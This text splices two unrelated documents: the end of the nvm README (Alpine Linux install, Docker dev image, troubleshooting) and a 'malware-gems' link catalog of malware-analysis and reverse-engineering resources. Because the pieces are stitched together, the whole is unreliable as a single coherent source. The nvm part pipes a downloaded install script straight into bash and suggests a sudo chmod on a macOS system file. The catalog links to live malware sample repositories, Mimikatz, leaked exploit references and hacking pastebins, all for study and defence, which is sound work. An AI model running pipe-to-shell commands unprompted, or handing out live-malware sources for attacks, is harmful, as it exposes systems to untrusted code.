Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [busybox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. Busybox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that.
There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally.
If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell:
```sh
apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
```
The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries.
As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node).
## Docker for development environment
To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository:
```sh
$ docker build -t nvm-dev .
```
This will package your current nvm repository with our pre-defiend development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`:
```sh
$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
nvm-dev latest 9ca4c57a97d8 7 days ago 1.22 GB
```
If you got no error message, now you can easily involve in:
```sh
$ docker run -it nvm-dev -h nvm-dev
nvm@nvm-dev:~/.nvm$
```
Please note that it'll take about 15 minutes to build the image and the image size would be about 1.2GB, so it's not suitable for production usage.
For more information and documentation about docker, please refer to its official website:
- https://www.docker.com/
- https://docs.docker.com/
## Problems
- If you try to install a node version and the installation fails, be sure to delete the node downloads from src (`~/.nvm/src/`) or you might get an error when trying to reinstall them again or you might get an error like the following:
curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume.
- Where's my `sudo node`? Check out [#43](https://github.com/creationix/nvm/issues/43)
- After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source:
```sh
nvm install -s 0.8.6
```
- If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/creationix/nvm/issues/658))
## Mac OS "troubleshooting"
**nvm node version not found in vim shell**
If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run:
```shell
sudo chmod ugo-x /usr/libexec/path_helper
```
More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x).
[1]: https://github.com/creationix/nvm.git
[2]: https://github.com/creationix/nvm/blob/v0.33.8/install.sh
[3]: https://travis-ci.org/creationix/nvm
[4]: https://github.com/creationix/nvm/releases/tag/v0.33.8
[Urchin]: https://github.com/scraperwiki/urchin
[Fish]: http://fishshell.com
|
# malware-gems
## NOTE: WORK IN PROGRESS! (Updated 19 July 2022)
### What's this all about?
This page contains a list of mostly malware analysis / reverse engineering related tools, training, podcasts, blog posts, literature and just about anything else closely related to the topic. This page serves as a catalog of sorts, containing "gems", some of which you may have stumbled across, and many others that you may not have.
### Who is this page aimed at?
#### Myself:
When first starting out, I was overwhelmed by how malware/RE related material was somewhat scattered all over the Internet. With a limited availability of books and training, I started to collect my go-to sites for certain resources and tools in order to achive certain tasks.
#### Beginners:
I often get asked "how do you get started in malware analysis / RE". I'm hoping this list will provide a starting point at least. Anyone who has been practicing malware analysis for even a small amount of time, knows that there really is no single resource or location that will simply teach the art of malware analysis / RE. Plain and simple. That said, having a useful list of links is at least a starting point. However, one caveat is that this list should NOT replace your OWN time spent researching and learning by yourself. This is very much part of "the journey" towards becomming a better malware analyst / RE, similar to that of becomming a l33t h4x0r! ;)
#### Anyone else:
Regardless of skill/experience level, even the more experienced malware analyst / RE may hopefully find one or two useful gems on this page that they haven't yet stumbled across. This is where the name "malware-gems" originated from... Original, I know.. ;)
### Isn't this similar to other "awesome" lists that exist on Github?
Perhaps. While the various awesome "awesome" lists (as awesome as they are) gave me inspiration, I wanted to centralise my own tools/links etc due to growing my own malware analysis skills, in the hope that once I have things in one page, things may hopefully become a bit clearer in my head! In some ways, as awesome as the other various "awesome" lists are, I hope that this list will in itself be just as awesome, due to the fact that the this reflects a true and current representation of a malware analyst such as myself, who is building up their own knowledge with active links to tools, reading material etc!
### Anything else?
If you have any feedback or would like your site listed, feel free to reach out via Twitter.
Twitter handle: [0x4143](https://twitter.com/0x4143)
###### Disclaimer:
* Full credits/props/respect to all the respective authors for their content.
* I suspect that this list may morph gradually over time to possibly include other infosec related tools/links that aren't directly related to malware or RE, but I will try my very best to stay on topic! =)
* The links contained in each section are currently in no particular order.
* I may clean up the order at some point e.g. alphabetize, or order by preference.
* Some tools/links may likely be in the wrong category, I will review this as time goes on.
* This is a work-in-progress so bare with me!
* Sharing is caring, so feel free to forward this link around.
* "Haters gonna hate"!
* And last but not least, **enjoy! =)
# Books:
* Intelligence Driven Incident Response - http://shop.oreilly.com/product/0636920043614.do
* Practical Malware Analysis - https://www.nostarch.com/malware
* Reversing: Secrets of Reverse Engineering - http://eu.wiley.com/WileyCDA/WileyTitle/productCd-0764574817.html
* Practical Reverse Engineering - http://eu.wiley.com/WileyCDA/WileyTitle/productCd-1118787315,subjectCd-CSJ0.html
* Malware Analyst Cookbook - http://eu.wiley.com/WileyCDA/WileyTitle/productCd-0470613033.html
* IDA Pro Book - https://www.nostarch.com/idapro2.htm
* Art of Assembly - http://www.plantation-productions.com/Webster/www.artofasm.com/index.html
* The Art of Memory Forensics - http://eu.wiley.com/WileyCDA/WileyTitle/productCd-1118825098.html
* Windows Internals, Part 1 (6th Edition) - https://www.microsoftpressstore.com/store/windows-internals-part-1-9780735648739
* Windows Internals, Part 2 (6th Edition) - https://www.microsoftpressstore.com/store/windows-internals-part-2-9780735665873
* Windows Internals, Part 1 (7th Edition):
https://www.microsoftpressstore.com/store/windows-internals-part-1-system-architecture-processes-9780735684188
* Windows Internals, Part 2 (7th Edition):
https://www.microsoftpressstore.com/store/windows-internals-part-2-9780135462409
* Hacking. The Art of Exploitation - https://www.nostarch.com/hacking2.htm
* The Shellcoder's Handbook: Discovering and Exploiting Security Holes - http://eu.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html
* Rootkits: Subverting the Windows Kernel - https://dl.acm.org/citation.cfm?id=1076346
* Rootkits and Bootkits - https://www.nostarch.com/rootkits
* The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage - http://www.simonandschuster.com/books/The-Cuckoos-Egg/Cliff-Stoll/9781416507789
* Rootkits: Subverting the Windows Kernel - https://dl.acm.org/citation.cfm?id=1076346
* The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System - https://www.safaribooksonline.com/library/view/the-rootkit-arsenal/9781449626365/
* Learning Malware Analysis - https://www.amazon.co.uk/Learning-Malware-Analysis-techniques-investigate/dp/1788392507/ref=sr_1_1?ie=UTF8&qid=1534162748&sr=8-1&keywords=malware+analysis
* Sandworm - https://www.penguinrandomhouse.com/books/597684/sandworm-by-andy-greenberg/
# CheatSheets/Tables:
* IDA Cheat Sheet - https://securedorg.github.io/idacheatsheet.html
* Cheat Sheets - https://highon.coffee/blog/cheat-sheet/
* File Signatures - http://www.garykessler.net/library/file_sigs.html
* APT Groups and Operations - https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml#
* Ransomware Overview - https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#
* Intel Assembler code table - http://www.jegerlehner.ch/intel/
* ARM Assembly Cheatsheet - https://azeria-labs.com/assembly-basics-cheatsheet/
* APTnotes - https://github.com/kbandla/APTnotes
* PE 101 - https://github.com/corkami/pics/blob/master/binary/pe101/pe101.pdf
* PDF 101 - https://github.com/corkami/docs/blob/master/PDF/PDF.md
* PDF analysis - https://github.com/zbetcheckin/PDF_analysis
* Digital Forensics and Incident Response - https://www.jaiminton.com/cheatsheet/DFIR/#
# CTF's:
* Flare-On - http://flare-on.com/
* LabyREnth - https://labyrenth.com/mud/
* Facebook CTF - https://github.com/facebook/fbctf
* CTF Field Guide - https://trailofbits.github.io/ctf/
* RootMe - https://www.root-me.org
* RPISEC CSCI 4968 - http://security.cs.rpi.edu/courses/binexp-spring2015/
* Crackmes - https://crackmes.one/
# Decoders:
* CyberChef - https://gchq.github.io/CyberChef/
* KevtheHermit RAT decoders - https://github.com/kevthehermit/RATDecoders
# Debuggers:
* OllyDbg - http://www.ollydbg.de/
* Immunity Debugger - https://www.immunityinc.com/products/debugger/
* X64dbg - https://x64dbg.com/#start
* Rvmi - https://github.com/fireeye/rvmi
* WinDBG - https://docs.microsoft.com/en-gb/windows-hardware/drivers/debugger/debugger-download-tools
# Disassemblers:
* IDA Pro - https://www.hex-rays.com/products/ida/
* Binary Ninja - https://binary.ninja/
* Radare2 - https://github.com/radare/radare2
* Cutter - https://github.com/radareorg/cutter
* BinNavi - https://github.com/google/binnavi
* Hopper - https://www.hopperapp.com/
* medusa - https://github.com/wisk/medusa
* Disassembler.io - https://www.onlinedisassembler.com/static/home/
* Ghidra - https://ghidra-sre.org/
# Document Analysis Tools:
* OfficeMalScanner/DisView - http://www.reconstructor.org/
* AnalyzePDF - https://github.com/hiddenillusion/AnalyzePDF
* BiffView - https://www.aldeid.com/wiki/BiffView
* oletools - https://www.decalage.info/python/oletools
* Origami Framework - https://github.com/cogent/origami-pdf
* PDF Stream Dumper - http://sandsprite.com/blogs/index.php?uid=7&pid=57
* CERMINE - https://github.com/CeON/CERMINE
* pdfid - https://blog.didierstevens.com/programs/pdf-tools/
* PDFwalker - https://www.aldeid.com/wiki/Origami/pdfwalker
* Peepdf - http://eternal-todo.com/tools/peepdf-pdf-analysis-tool
* pev - http://pev.sourceforge.net/
* FOCA - https://www.elevenpaths.com/labstools/foca/index.html
* LuckyStrike - https://github.com/curi0usJack/luckystrike
* RTF Cleaner - https://github.com/nicpenning/RTF-Cleaner
* RTFScan - http://www.reconstructer.org/
# Dynamic/Behavioural Analysis Tools:
* CaptureBAT - https://www.honeynet.org/node/315
* Sysinternals Suite - https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
* ProcDOT - http://www.procdot.com/
* Process Hacker - http://processhacker.sourceforge.net/
* Sysmon - https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
* API Monitor - http://www.rohitab.com/apimonitor
* Regshot - https://sourceforge.net/projects/regshot/
* SwiftonSecurity Sysmon Config - https://github.com/SwiftOnSecurity/sysmon-config
* Capture-Py - https://github.com/fbruzzaniti/Capture-Py
* Windows Kernel Explorer - https://github.com/AxtMueller/Windows-Kernel-Explorer
# Funny/Random:
* Win95 defrag - http://hultbergs.org/defrag/
* Little Bobby - http://www.littlebobbycomic.com/
* Dilbert - http://dilbert.com/
* XKCD - https://xkcd.com/
* Why the fuck was i breached - https://whythefuckwasibreached.com/
* VIM Adventures - https://vim-adventures.com/
# Honeypots:
* Modern Honey Network - https://github.com/threatstream/mhn
# ICS:
* Graphical Realism Framework for Industrial Control Simulations - https://github.com/djformby/GRFICS
* ꓘamerka - https://woj-ciech.github.io/kamerka-demo/kamerka.html
# IDA:
* stackstring_static.py - https://github.com/TakahiroHaruyama/ida_haru/tree/master/stackstring_static
* emotet_payload_decryption.py - https://gist.github.com/levwu/23751fe47f83d42ed6a63280a4f2aaaa
* VB IDC - https://www.hex-rays.com/products/ida/support/freefiles/vb.idc
* Diaphora - https://github.com/joxeankoret/diaphora
* BinDiff - https://www.zynamics.com/bindiff.html
* fnfuzzy - https://github.com/TakahiroHaruyama/ida_haru/tree/master/fn_fuzzy
* BinDiff wrapper - https://github.com/TakahiroHaruyama/ida_haru/tree/master/bindiff
* simpliFiRE.IDAscope - https://bitbucket.org/daniel_plohmann/simplifire.idascope/src/master/
* IDA Plugins - http://www.openrce.org/downloads/browse/IDA_Plugins
* FindCrypt - https://github.com/you0708/ida/tree/master/idapython_tools/findcrypt
# IOT:
* Binwalk - https://github.com/devttys0/binwalk
* JTAG Explained - http://blog.senr.io/blog/jtag-explained
* Firmware Analysis Toolkit - https://github.com/attify/firmware-analysis-toolkit
* Saleae Logic Analyzer software - https://www.saleae.com/downloads/
# IR:
* Detecting Lateral Movement through Tracking Event Logs - https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
* Incident Response Methodologies - https://github.com/certsocietegenerale/IRM
* MITRE ATT&CK Framework - https://attack.mitre.org/wiki/Main_Page
# JavaScript Deobfuscation Tools:
* SpiderMonkey (js) - https://blog.didierstevens.com/programs/spidermonkey/
* Malzilla - http://malzilla.sourceforge.net/
* Malware-Jail - https://github.com/HynekPetrak/malware-jail
# LNK File Analysis:
* https://lifeinhex.com/analyzing-malicious-lnk-file/
# MAC:
* MacOS Papers, Slides and Thesis Archive - https://papers.put.as/macosx/macosx/
* norimaci - https://github.com/mnrkbys/norimaci
* DTrace: [even better than] strace for OS X - https://8thlight.com/blog/colin-jones/2015/11/06/dtrace-even-better-than-strace-for-osx.html
# Malware Repo's:
* MalwareBazaar - https://bazaar.abuse.ch/
* VXVault - http://vxvault.net/ViriList.php
* MalShare - https://malshare.com/
* CyberCrime Tracker - http://cybercrime-tracker.net/index.php
* TheZoo - https://github.com/ytisf/theZoo
* Endgame Ember - https://github.com/endgameinc/ember
* Global ATM Malware Wall - http://atm.cybercrime-tracker.net/index.php
* What is this C2 - https://github.com/misterch0c/what_is_this_c2
* Connect Trojan - https://www.connect-trojan.com/
* ViriBack C2 Tracker - http://tracker.viriback.com/
* VirusBay - https://beta.virusbay.io/
# Maps / Stats (eye candy):
* ThreatButt - https://threatbutt.com/map/
* BitDefender - https://threatmap.bitdefender.com/
* FireEye - https://www.fireeye.com/cyber-map/threat-map.html
* Global Incident Map - http://www.globalincidentmap.com/
* Tor Flow - https://torflow.uncharted.software/
* Kaspersky Cybermap - https://cybermap.kaspersky.com/
* Security Wizardry - http://www.securitywizardry.com/radar.htm
* Norse Attack Map - http://map.norsecorp.com/#/
* Digital Attack Map - http://www.digitalattackmap.com/#anim=1&color=0&country=ALL&list=0&time=16938&view=map
* Stats - http://breachlevelindex.com/
* Current Cyber Attacks - http://community.sicherheitstacho.eu/start/main
* FSecure - http://worldmap3.f-secure.com/
* Talos - https://talosintelligence.com/
* Security Wizardry - https://radar.securitywizardry.com/
* Ransomware Attack Map - https://statescoop.com/ransomware-map/
# Memory Forensics:
* Volatility - http://www.volatilityfoundation.org/
* Memoryze - https://www.fireeye.com/services/freeware/memoryze.html
* DumpIt - https://blog.comae.io/your-favorite-memory-toolkit-is-back-f97072d33d5c
* Hibr2Bin - https://blog.comae.io/your-favorite-memory-toolkit-is-back-f97072d33d5c
* Rekall Memory Forensic Framework - https://github.com/google/rekall
* Clonezilla - http://clonezilla.org/
* dd - https://linux.die.net/man/1/dd
* Fog - https://fogproject.org/
* Forensic Toolkit (FTK) - http://www.accessdata.com/product-download
* Redline - https://www.fireeye.com/services/freeware/redline.html
* MemLabs - https://github.com/stuxnet999/MemLabs
# Misc Tools:
* File Signature Analysis - https://filesignatures.net/index.php?page=all
* EKFiddle - https://github.com/malwareinfosec/EKFiddle
* XMind - http://www.xmind.net/
* ExamDiff - http://www.prestosoft.com/edp_examdiff.asp
* 7zip - http://www.7-zip.org/download.html
* Visual Studio - https://www.visualstudio.com/
* WinSCP - https://winscp.net/eng/download.php
* Putty - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
* TreeSizeFree - https://www.jam-software.com/treesize_free/
* OneNote - https://www.onenote.com/
* KeePass - https://keepass.info/
* ExifTool - https://www.sno.phy.queensu.ca/~phil/exiftool/
* RegEx 101 - https://regex101.com/
* Byte Counter - https://mothereff.in/byte-counter
* Utilu IE Collection - http://utilu.com/IECollection/
* UserAgentString - http://www.useragentstring.com/
* Maltego - https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php
* Cmder - http://cmder.net/
* MalPull - https://github.com/ThisIsLibra/MalPull
* StringSifter - https://github.com/mandiant/stringsifter
# .Net Debuggers/Decompilers:
* ILSpy - http://ilspy.net/
* dnSpy - https://github.com/0xd4d/dnSpy
* dotPeek - https://www.jetbrains.com/decompiler/
* de4dot - https://github.com/0xd4d/de4dot
* Reflector - https://www.red-gate.com/products/dotnet-development/reflector/index
# Network Analysis:
* Wireshark - https://www.wireshark.org/
* Network Miner - http://www.netresec.com/?page=NetworkMiner
* LogRhythm Network Monitor Freemium - https://logrhythm.com/network-monitor-freemium/
* dig - https://linux.die.net/man/1/dig
* curl - https://curl.haxx.se/docs/manpage.html
* ApateDNS - https://www.fireeye.com/services/freeware/apatedns.html
* NetCat - http://netcat.sourceforge.net/
* Nslookup - https://linux.die.net/man/1/nslookup
* PDF Stream Dumper - http://sandsprite.com/blogs/index.php?uid=7&pid=57
* Robtex - https://www.robtex.com/
* Belati - https://github.com/aancw/Belati
* Ostinato - http://ostinato.org/
* Burp Suite - https://portswigger.net/burp/
* Hak5 - https://hakshop.com/
* Fiddler - https://www.telerik.com/fiddler
* Shodan - https://www.shodan.io/
* FakeNet-NG - https://github.com/fireeye/flare-fakenet-ng
* Netzob - https://github.com/netzob/netzob
* DShell - https://github.com/USArmyResearchLab/Dshell
* SecurityOnion - https://securityonion.net/
* Reverse engineering network protocols - Reverse Engineering Network Protocols
* MITMProxy - https://mitmproxy.org/
* DNSChef - https://github.com/iphelix/dnschef
# Operating Systems:
* Remnux - https://remnux.org/
* SIFT - https://digital-forensics.sans.org/community/downloads
* Kali - https://www.kali.org/
* CAINE - http://www.caine-live.net/
* Metasploitable 3 - https://github.com/rapid7/metasploitable3
* DVWA - http://www.dvwa.co.uk/
* Security Onion - https://securityonion.net/
* FLARE VM - https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html
* OWASP WebGoat - https://www.owasp.org/index.php/WebGoat_Installation#Installing_to_Windows
* OWASP Bricks - https://www.owasp.org/index.php/OWASP_Bricks
* OWASP Mantra - http://www.getmantra.com/
* Tails - https://tails.boum.org/
* Whonix - https://www.whonix.org/
* Santoku - https://santoku-linux.com/about-santoku/
# OSINT Online Tools:
* OSINT Gathering - https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05
* Automating OSINT Blog - http://www.automatingosint.com/blog/
* SpiderFoot - https://www.spiderfoot.net/
* Buscador - https://inteltechniques.com/buscador/
# Password Cracking:
* Hashcat - https://github.com/hashcat/hashcat
* Crack.sh - https://crack.sh/
* Mimikatz - https://github.com/gentilkiwi/mimikatz
* Ophcrack - http://ophcrack.sourceforge.net/
# Podcasts:
* Security Now - https://www.grc.com/securitynow.htm
* SANS Stormcast - https://isc.sans.edu/podcast.html
* Down the Security Rabbithole - http://podcast.wh1t3rabbit.net/
* Defensive Security - https://defensivesecurity.org/category/podcast/
* Paul's Security Weekly - https://wiki.securityweekly.com/Show_Notes
* RunAs Radio - http://www.runasradio.com/
* Defensive Security Podcast - https://defensivesecurity.org/
* Darknet Diaries - https://darknetdiaries.com/
* Risky Business Podcast - https://risky.biz/
* Security Nation Podcast - https://podcasts.apple.com/gb/podcast/security-nation/id1124543784
* Smashing Security - https://www.smashingsecurity.com/
# PowerShell decoding:
* PSDecode - https://github.com/R3MRUM/PSDecode
* PyPowerShellXray - https://github.com/JohnLaTwC/PyPowerShellXray
* PowerShellRunBox: Analyzing PowerShell Threats Using PowerShell Debugging - https://darungrim.com/research/2019-10-01-analyzing-powershell-threats-using-powershell-debugging.html
# Ransomware:
* No More Ransomware - https://www.nomoreransom.org/en/index.html
* ID Ransomware - https://id-ransomware.malwarehunterteam.com/
* Emisoft decrypters - https://www.emsisoft.com/ransomware-decryption-tools/
# Reading Material:
* Reverse Engineering for Beginners - https://beginners.re/
* Phrack - http://phrack.org/
* Crypto 101 - https://www.crypto101.io/
* Hacker Manifesto - http://phrack.org/issues/7/3.html
* How to Become a Hacker - http://www.catb.org/esr/faqs/hacker-howto.html
* Zines - https://github.com/fdiskyou/Zines
* Hackaday - https://hackaday.com/blog/
* Hacktress - http://www.hacktress.com/
* Reddit - https://www.reddit.com/r/ReverseEngineering/
* Windows API Index - https://msdn.microsoft.com/en-gb/library/windows/desktop/hh920508(v=vs.85).aspx
* Raw Hex - https://rawhex.com/
* DigiNinja - https://digi.ninja/
* Team Cymru - http://www.team-cymru.org/index.html
* Lenny Zeltser - https://zeltser.com/malicious-software/
* OverAPI - http://overapi.com/
* HackBack - https://pastebin.com/0SNSvyjJ
* FlexiDie - https://pastebin.com/raw/Y1yf8kq0
* DefCon archive - https://media.defcon.org/
* Malwology - https://malwology.com/
* Stuxnet's Footprint in memory with Volatility - http://mnin.blogspot.co.uk/2011/06/examining-stuxnets-footprint-in-memory.html
* AtomBombing - https://breakingmalware.com/injection-techniques/atombombing-brand-new-code-injection-for-windows/
* Malware Archaeology - https://www.malwarearchaeology.com/cheat-sheets
* ShinoLocker - https://shinolocker.com/
* A crash course in x86 assembly for reverse engineers - https://sensepost.com/blogstatic/2014/01/SensePost_crash_course_in_x86_assembly-.pdf
* Zero Days, Thousands of Nights - https://www.rand.org/pubs/research_reports/RR1751.html
* Shadow Brokers Exploit Reference Table - https://docs.google.com/spreadsheets/d/1sD4rebofrkO9Rectt5S3Bzw6RnPpbJrMV-L1mS10HQc/edit#gid=1602324093
* GracefulSecurity - https://www.gracefulsecurity.com/infrastructure-security-articles/
* Cybersecurity ain't easy. Let's talk about it - https://itspmagazine.com/itsp-chronicles/cybersecurity-ain-t-easy-lets-talk-about-it
* How to become the best malware analyst e-v-e-r - http://www.hexacorn.com/blog/2018/04/14/how-to-become-the-best-malware-analyst-e-v-e-r/
* Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware - https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html
* Dr Fu's Security Blog - http://fumalwareanalysis.blogspot.com/p/malware-analysis-tutorials-reverse.html
* Encoding vs. Encryption vs. Hashing vs. Obfuscation - https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/
* Introduction to reverse engineering and Assembly - https://kakaroto.homelinux.net/2017/11/introduction-to-reverse-engineering-and-assembly/
* Getting started with reverse engineering - https://lospi.net/developing/software/software%20engineering/reverse%20engineering/assembly/2015/03/06/reversing-with-ida.html
* Guide to x86 Assembly - http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
* Nightmare (RE) - https://github.com/guyinatuxedo/nightmare
* PDB Files: What Every Developer Must Know - https://www.wintellect.com/pdb-files-what-every-developer-must-know
* BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts) - https://medium.com/bugbountywriteup/bolo-reverse-engineering-part-1-basic-programming-concepts-f88b233c63b7
* BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts) - https://medium.com/@danielabloom/bolo-reverse-engineering-part-2-advanced-programming-concepts-b4e292b2f3e
* String Hashing: Reverse Engineering an Anti-Analysis Control - https://r3mrum.wordpress.com/2018/02/15/string-hashing-reverse-engineering-an-anti-analysis-control/
* Ground Zero: Part 1 – Reverse Engineering Basics – Linux x64 - https://0xdarkvortex.dev/index.php/2018/04/09/ground-zero-part-1-reverse-engineering-basics/
* Let's Build a Compiler - https://compilers.iecc.com/crenshaw/
* Static Malware Analysis with OLE Tools and CyberChef - https://newtonpaul.com/static-malware-analysis-with-ole-tools-and-cyber-chef/
* An Introduction to Reverse Engineering - https://www.muppetlabs.com/~breadbox/txt/bure.html
* VXUnderground - https://vx-underground.org/papers.html
* Tracking Advanced Persistent Threats (APTs) via Shared Code - https://medium.com/@arun_73782/tracking-apts-by-shared-code-5e88a2ae2363
* YARA Hunting for Code Reuse: DoppelPaymer Ransomware & Dridex Families - https://www.sentinelone.com/blog/yara-hunting-for-code-reuse-doppelpaymer-ransomware-dridex-families/
* Here We GO: Crimeware Virus & APT Journey From “RobbinHood” to APT28 - https://www.sentinelone.com/blog/here-we-go-crimeware-apt-journey-from-robbinhood-to-apt28/
* The mysterious case of CVE-2016-0034: the hunt for a Microsoft Silverlight 0-day - https://securelist.com/the-mysterious-case-of-cve-2016-0034-the-hunt-for-a-microsoft-silverlight-0-day/73255/
* Process Injection part 1 of 5 - https://3xpl01tc0d3r.blogspot.com/2019/08/process-injection-part-i.html
* OSINT : Chasing Malware + C&C Servers - https://medium.com/secjuice/chasing-malware-and-c-c-servers-in-osint-style-3c893dc1e8cb
* Daily dose of malware - https://github.com/woj-ciech/Daily-dose-of-malware
* Tracking Malware with Import Hashing - https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html
* STOMP 2 DIS: Brilliance in the (Visual) Basics - https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html
* Advanced Binary Deobfuscation - https://github.com/malrev/ABD
* A Case Study Into Solving Crypters/packers in Malware Obfuscation Using an SMT Approach - https://vixra.org/abs/2002.0183
* ReCon Montreal Archives - https://recon.cx/2019/montreal/archives/
* FLARE IDA Pro Script Series: MSDN Annotations IDA Pro for Malware Analysis - https://www.fireeye.com/blog/threat-research/2014/09/flare-ida-pro-script-series-msdn-annotations-ida-pro-for-malware-analysis.html
* Analyzing Modern Malware Techniques - Part 1 (of 4) - https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663
* What Every Computer Programmer Should Know About Windows API, CRT, and the Standard C++ Library - https://www.codeproject.com/Articles/22642/What-Every-Computer-Programmer-Should-Know-About-W
* theForger's Win32 API Programming Tutorial - http://www.winprog.org/tutorial/start.html
* Unbreakable Cryptography in 5 Minutes - https://blog.xrds.acm.org/2012/08/unbreakable-cryptography-in-5-minutes/
* Let’s play (again) with Predator the thief - https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/
* VMProtect Introduction - https://shhoya.github.io/vmp_vmpintro.html
* Azorult loader stages - https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/
* Reversing Malware Command and Control: From Sockets to COM - https://www.fireeye.com/blog/threat-research/2010/08/reversing-malware-command-control-sockets.html
* Indicators of Compromise (IoCs) and Their Role in Attack Defence - https://tools.ietf.org/html/draft-paine-smart-indicators-of-compromise-00
* Zombieland CTF – Reverse Engineering for Beginners - https://mcb101.blog/2019/10/11/zombieland-ctf-reverse-engineering-for-beginners/
* Fu11Shade Windows Exploitation - https://fullpwnops.com/windows-exploitation-pathway.html
# Sandbox Tools (Online):
* VirusTotal - https://www.virustotal.com
* Malwr - https://malwr.com/
* Reverse.it - https://www.reverse.it/
* Open Analysis - http://www.openanalysis.net/
* ANY.RUN - https://any.run/
* Hybrid Analysis - https://www.hybrid-analysis.com/
* Intezer Analyze - https://analyze.intezer.com/
# Sandbox Tools (Offline):
* Noriben - https://github.com/Rurik/Noriben
* Cuckoo - https://www.cuckoosandbox.org/
* PyREBox - https://github.com/Cisco-Talos/pyrebox
* Viper - http://viper.li/
* MISP - http://www.misp-project.org/
* Sandboxie - https://www.sandboxie.com/
* Ph0neutria - https://github.com/phage-nz/ph0neutria
* FlareVM - https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html
# Shellcode Tools:
* JMP2IT - https://github.com/adamkramer/jmp2it
* Shellcode2exe.py - https://github.com/MarioVilas/shellcode_tools
* ConvertShellCode - http://le-tools.com/ConvertShellcode.html
* scdbg - http://sandsprite.com/blogs/index.php?uid=7&pid=152
# Static Analysis Tools:
* PEiD -https://www.aldeid.com/wiki/PEiD
* McAfee FileInsight - https://www.mcafee.com/uk/downloads/free-tools/fileinsight.aspx
* HashMyFiles - http://www.nirsoft.net/utils/hash_my_files.html
* CFF Explorer - http://www.ntcore.com/exsuite.php
* AnalyzePESig - https://blog.didierstevens.com/2012/10/01/searching-for-that-adobe-cert/
* ByteHist - https://www.cert.at/downloads/software/bytehist_en.html
* Exeinfo - http://exeinfo.pe.hu/
* Scylla - https://github.com/NtQuery/Scylla
* MASTIFF - https://git.korelogic.com/mastiff.git/
* PEframe - https://github.com/guelfoweb/peframe
* PEscan - https://tzworks.net/prototype_page.php?proto_id=15
* PEstudio - https://www.winitor.com/
* PE-Bear - https://hshrzd.wordpress.com/2013/07/09/introducing-new-pe-files-reversing-tool/
* PE-sieve - https://github.com/hasherezade/pe-sieve
* Flare-Floss - https://github.com/fireeye/flare-floss
* PatchDiff2 - https://github.com/filcab/patchdiff2
* PE Insider - http://cerbero.io/peinsider/
* Resource Hacker - http://www.angusj.com/resourcehacker/
* DarunGrim - https://github.com/ohjeongwook/DarunGrim
* Mal Tindex - https://github.com/joxeankoret/maltindex
* Manalyze - https://github.com/JusticeRage/Manalyze
* PDBlaster - https://github.com/SecurityRiskAdvisors/PDBlaster
* ImpFuzzy - https://github.com/JPCERTCC/impfuzzy
* Florentino - https://github.com/0xsha/florentino/blob/master/README.md
* Viper - https://viper.li/en/latest/
# Text/hex Editor Tools:
* Notepad++ - https://notepad-plus-plus.org/
* 010 Editor - https://www.sweetscape.com/010editor/
* HxD - https://mh-nexus.de/en/hxd/
* BinText - https://www.aldeid.com/wiki/BinText
* Hexinator - https://hexinator.com/
# Threat Intelligence:
* ThreatMiner - https://www.threatminer.org/
* RiskIQ Community - https://community.riskiq.com/home
* PasteBin - https://pastebin.com/
* Shodan - https://www.shodan.io/
* Censys - https://censys.io/
* DNSdumpster - https://dnsdumpster.com/
* URLHaus - https://urlhaus.abuse.ch/
